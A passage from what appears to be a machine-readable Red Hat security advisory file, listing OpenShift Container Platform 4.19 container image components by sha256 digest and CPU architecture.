"product_reference": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64"
},
"product_reference": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64"
},
"product_reference": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x"
},
"product_reference": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64"
},
"product_reference": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64"
},
"product_reference": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64"
},
"product_reference": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x"
},
"product_reference": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64"
},
"product_reference": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64"
},
"product_reference": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x"
},
"product_reference": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64"
},
